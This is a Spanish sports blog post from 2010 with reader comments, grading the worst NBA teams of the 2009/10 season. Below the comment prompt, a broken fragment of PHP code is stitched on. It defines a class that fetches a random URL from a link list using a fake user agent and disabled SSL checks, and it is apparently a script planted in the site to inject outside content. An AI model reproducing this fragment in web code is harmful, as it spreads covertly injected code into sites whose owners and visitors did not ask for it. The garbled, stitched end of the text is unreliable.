Las notas de fin de curso 2009/10: Muy deficientes

28 de June de 2010 por TheDeerHunter
Artículo 1 de 5 de la serie Las notas de fin de curso 2009/2010

Concluiremos esta intensa campaña buscando la visión global de lo que nos ha deparado. Para ello os presentamos nuestra modesta evaluación sobre cada equipo, que seguro vosotros seréis capaces de completar.

NEW JERSEY NETS

Si hablamos de “muy deficientes” el primero que nos vendrá a la cabeza será el de uno de los peores equipos de la historia de la competición, capaz de estar,durante buena parte del curso, en condiciones de batir la marca de los lamentablemente célebres Philadelphia “nine & 73-ers” de la 1972-73. La falta de ambición de una franquicia en situación de mudanza, una plantilla a priori corta y descompensada, el irregular desarrollo de sus jóvenes perlas y la mala suerte en forma de lesiones han desatado este despropósito. Para más inri ni siquiera les tocó el pick nº 1 en la lotería, cuando se habían esforzado tanto por obtener los máximos números posibles.

Lo mejor: Si el objetivo del curso era “esperar el sol en forma de potentado ruso” lo han logrado. La línea a partir de ahora la marcará Mr. Prokhorov que, mala o buena, es una dirección a seguir no exenta de cierto criterio y experiencia en el gremio. A pesar de que no siempre es suficiente, contarán con dinero y margen para traer buenos jugadores. La búsqueda de “Eldorado” (LeBron) también se resolverá este verano de una vez por todas y puede que también buena parte del futuro real del club. Y bueno… siendo positivos, será difícil asistir a otra temporada peor que ésta.

– Lo peor: Demasiados partidos alineando de salida a “cracks” del nivel de Trenton Hassell, Josh Boone, Jarvis Hayes, Terrence Williams o Kenyon Dooling. La temporada de Devin Harris ha sido particularmente decepcionante y parece que finalmente se van a desprender de Douglas-Roberts básicamente regalado. John Wall no vendrá.

MINNESOTA TIMBERWOLVES

Año 1 después de Ricky. El catalán ganándolo (casi) todo en Europa y los Wolves dando gracias a los cielos porque haya habido un equipo tan terrorífico como los Nets. Aunque al final tampoco se han quedado tan lejos, al menos se han librado buena parte del curso de la atención mediática que han desviado aquellos.

A perro flaco todos son pulgas y la cosa empezó muy mal con la lesión de Love, continuó peor con el rendimiento del rutilante fichaje Sessions y terminó fatal con Al Jefferson, su estado de forma y sus malas migas con Kevin Love cuando volvió éste. Kurt Rambis no ha sido la solución y David Kahn no es que haya supuesto la revolución en la franquicia precisamente. Da toda la sensación que en lugar de avanzar retroceden. Sin embargo ya es difícil hacerlo peor. Sólo pueden mejorar.

– Lo mejor: Jonny Flynn se ha destapado como un más que correcto director de juego. Uno de los pocos aciertos de David Kahn. Han podido contar por primera vez con Corey Brewer durante los 82 partidos y no lo ha hecho mal.  Por primera vez en su carrera NBA Darko Milicic ha resultado medianamente útil a un proyecto y parece sentirse a gusto allí. Finalmente, el pick #4 les ha dado la posibilidad de cazar a Wesley Johnson.

– Lo peor: Tiene toda la pinta que la reconstrucción alrededor de Al Jefferson va a resultar abortada de forma inminente. Sería una triste conclusión al traspaso de Garnett y es un tremendo contratiempo a la dirección estratégica de la franquicia. No es que esperáramos que el fichaje de Sessions iba a suponer un salto de calidad definitivo, pero su temporada ha sido tremendamente decepcionante. Ni David Kahn ni Kurt Rambis pueden tener margen de error infinito. Ambos se la juegan este año.

WASHINGTON WIZARDS

Había un dicho popular que decía que “quien con niño se acuesta cagado se levanta”. Perdón por la incorrección, pero ilustra perfectamente lo que le ha sucedido a este equipo. Y es que resulta obsceno constatar la infame cantidad de dinero, recursos y años tirados a la basura en un proyecto alrededor de la infantil cabecita de Gilberto.

Al contrario que  en el caso de los anteriores equipos esperábamos mucho más de Washington. ¡Nada menos que Playoffs y “quién sabe”! Del quinteto titular que definíamos al principio de curso sólo queda Arenas y únicamente porque ha resultado imposible desprenderse de él. Si no está acabado le queda poco y para la franquicia  queda el proceso de reconstrucción completo. Desde “Zero”.

– Lo mejor: La promesa de John Wall. En ocasiones, del medio del mayor de los caos surgen buenos elementos. Ese es el caso de Andray Blatche que se ha ganado a pulso ser importante en el nuevo proyecto que se va a iniciar este curso.

– Lo peor: Lo peor no es el extremo y llamativo caso Gilbert Arenas. Lo peor es que esto no empieza ni termina aquí, que es algo más complicado que todo eso y que tiene mucho que ver con costumbres y maneras de pensar profundamente alojadas en la psicología de la sociedad que envuelve esta liga.

DETROIT PISTONS

Batacazo tremebundo de un equipo acostumbrado los últimos años a estar siempre arriba, a ganar y perder finales, a ser sólido como pocos. Muy mal le ha salido la jugada a Dumars por segundo año consecutivo con la salvedad de que ahora no tiene a Allen Iverson para echarle las culpas de todo. Todo el espacio salarial que ganó largando a Billups lo invirtió en dos fichajes a priori interesantes. Gordon y Villanueva han devuelto la apuesta con un año para olvidar y para colmo la vieja guardia y las tradicionales señas de identidad han terminado por desintegrarse. El problema no es tanto un pésimo año colectivo sino las sensaciones que se desprenden en el nacimiento del proyecto. Deberán tomar decisiones fuertes y dolorosas, con un margen de error cada vez más corto.

– Lo mejor: Algún mes de juego a nivel all-star de Rodney Stuckey. La irrupción de Jonas Jebreko. El haber vuelto a ver a Big Ben vestido con la camiseta de los Pistons. Que es difícil que coincida otro año tan malo de Hamilton, Gordon, Prince y Villanueva simultáneamente.

– Lo peor: La imagen de colectivo completamente desintegrado. Lo rápido que se puede destruir un grupo tan sólido y la curiosa falta de entrega de la vieja guardia. La sensación creciente de que Villanueva puede ser un bluff definitivo. Una nueva fase de reconstrucción (empezando por el GM) puede estar a un paso apenas sin haber comenzado ésta.

PHILADELPHIA 76ERS

Jarro de agua fría para los Sixers tras varias temporadas de crecimiento. La marcha de André Miller dejó un tanto huérfanos a un equipo fundamentado en un bloque joven. Además, la temprana lesión de Louis Williams incrementó gravemente el problema. Holiday tiene pinta interesante, pero no para conducirle de inmediato a plazas de playoffs. Además de un progreso muy limitado de sus jovenes valores, Eddie Jordan se encontró con un problema inesperado que se ha convertido en definitivo: la vuelta de Elton Brand en decadencia y su adaptación a su nuevo rol y a los sistemas.

– Lo mejor: El pick n#2 sabe a gloria y Turner promete ser un gran jugador. Volver a ver a Iverson con la camiseta de los Sixers… aunque haya sido por poco tiempo.

– Lo peor: Mr. 20-10 es más un Mr. 10-5 ahora mismo y no creemos que vaya a mejorar demasiado en el futuro. El liderazgo de Iguodala se ha puesto en seria duda, igual que el proyecto que encabeza. Ni Thaddeus Young, ni Speights, ni Willie Green han dado un paso adelante. Los refuerzos muy flojos. La defensa de un equipo tan físico ha rozado por momentos lo ridículo.

LOS ÁNGELES CLIPPERS

Evaluar a los Clippers con un “muy deficiente” tiene un punto de injusticia. La mala suerte volvió a cebarse con ellos pocos días antes de comenzar la temporada. Blake Griffin, su mejor activo, se lesionaba y no hemos podido disfrutar de su juego todavía. Además estamos asistiendo al ocaso definitivo de Baron Davis, que tantos buenos ratos nos ha hecho pasar (aunque no tantos a los aficionados de este equipo), la final asimilación de los fracasos de Al Thornton y Mike Dunleavy, el decepcionante traspaso de Camby y el preocupante estancamiento de Eric Gordon, también con problemas físicos por medio. Con todo Kaman ha llegado a ser all-star jugando a un nivel bestial e incluso llegaron a apuntar en algún momento a plaza de playoffs. Misión imposible.

– Lo mejor: Mantienen un bloque de gran calidad por metro cuadrado y si Griffin es la mitad de lo que se dice de él formarán uno de los mejores juegos interiores de la liga, sin renunciar a un compensado juego exterior. Por fin se han liberado de Thornton y Dunleavy que ya habían finiquitado con creces su decepcionante ciclo.

– Lo peor: El gafe del equipo, que apunta a hacerse crónico. El ocaso de Baron Davis. Desarrollo nulo de Eric Gordon.

Comenta

8 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Gran análisis, Deer.

    Por partes…

    Nets: Pese al ridículo, y pese a la mala suerte en el draft, si se llevan alguno de los grandes FA’s, habrá valido la pena y tienen motivos para ser optimistas. Parece buena idea desprenderse de Douglas-Roberts, que es un cortocircuitos mix total y por ejemplo Terrence Williams ha rendido muy por encima. A Devin Harris le daremos otro año de margen, porque el talento lo tiene.

    Wolves: ¿Alguien entiende a Rambis? Ha hecho cosas muy raras con Love, con Sessions, con Gomes, con Milicic… No sé si seguía instrucciones de Kahn, es la única explicación para entender todo lo que ha hecho sin que lo echasen. La gran sorpresa, la irrupción de Brewer como triplista.

    Wizards: Qué suerte la suya, si es que Wall es tan bueno, claro. Pero sigo sin fiarme de Blatche, y mucho menos de Arenas. Dudo que Hinrich llegue a debutar.

    Pistons: Lo dije hace tiempo y lo repito, me parece un error terrible hacer espacio salarial para gastarlo en Villanueva y Ben Gordon, dos jugadores que no te llevan a ningún sitio.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    PEnsaba que Gordon y Villanueva habían firmado por 3 años. El primero se puede fracasar,,el segundo tiene la reválida y el tercero es un expiring. Peron,,no más de 3 años..
    ¿Milicic vuelve a europa? ¿se relajará al estar más cerca de las madres italianas?

      Citar

  3. MagicJohnson32 dice:
    #3

    4 años cada uno, más player options para el quinto de más de 13 kilos la de Gordon y más de 8 kilos la de Charlie. Buff…

      Citar

  4. Óscar dice:
    #4

    Lo peor, a pesar de la temporada de New Jersey, ha sido la campaña de los Sixers, si comparas jugadores y potencial con los resultados. No saben cómo desprenderse de Iguodala, la única vía de escape que les queda. Lo de Eddie Jordan ha sido bochornoso y a mí me gustaba la idea…
    Y los Nets, por mucho cambio que pretendan yo no creo que deban ser muy optimistas. La reconstrucción va a ser total y eso lleva tiempo.
    Los Clippers… Lo mejor es el cese de Dunleavy, que ha llegado demasiado tarde. Todo dependerá de cómo responda Blake Griffin. Tienen mucho margen de maniobra, con sólo 5 jugadores con contrato.
    Los Pistons son una incógnita, y Wolves y Wizards estarán en el furgón de cola, o eso parece.

      Citar

  5. Txusma dice:
    #5

    De momento Blatche se tira 3 meses fueras con un pie roto. Llegará a tiempo para el training camp pero ya es el primer contratiempo. Es un cabeza loca pero no más que Artest así que creo que se le puede dar un voto de confianza y la manija en el juego interio ahora que no están Jamison ni Haywood. De hecho, no les queda otra a los Wizards. Si juega Hinrich pasará a Arenas a ser más 2?
    Los Clippers pueden hacer algo bonito este año. Davis va para abajo pero aun da sus minutos de calidad y puede enseñar 4 cosas al base que han pillado en el draft (Bledsoe) y Eric Gordon ha estado lesionado bastante tiempo creo recordar lo que le ha frenado. Un quinteto Davis-Gordon-Aminu-Griffin-Kaman no suena mal ni para el presente ni, sobretodo, para el futuro. Y además tiene hueco para acabar de jugar sus cartas. No creo que les llegué para uno de los mega-cracks, eso sí.

      Citar

  6. TheDeerHunter dice:
    #6

    Mejor va a sonar el quinteto de tus Bulls, si se confirma lo de LeBron como se dice

      Citar

  7. sergio dice:
    #7

    Supongo que habría que separar entre estos equipos a los que tienen mala pinta en el futuro: Wizards (hasta que no se libren de Arenas), Detroit (no podrán reconstruir en un par de años), Minnesota (si no venden o motivan a Jefferson); y los que si parecen tener futuro: Nets (con uno de los 5-6 mejores agentes libres seran equipo alto de Playoffs) o Clippers (un Blake, Gordon, Thornton, Griffin, Kaman tiene buena pinta).

    Lo de los Sixers lo dejo en un punto intermedio porq disponen de piezas jovenes pero no de un equipo compensado.

    De todas maneras su futuro dependerá de como se muevan este verano. Suerte a todos ellos!

      Citar

  8. KB # 24 dice:
    #8

    Sergio, Thornton ya hace unos meses que no está en los Clippers!

    Los Clippers siempre caen simpáticos, siempre tienen buena pinta y nunca hacen nada. Vaya gafe de franquícia…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>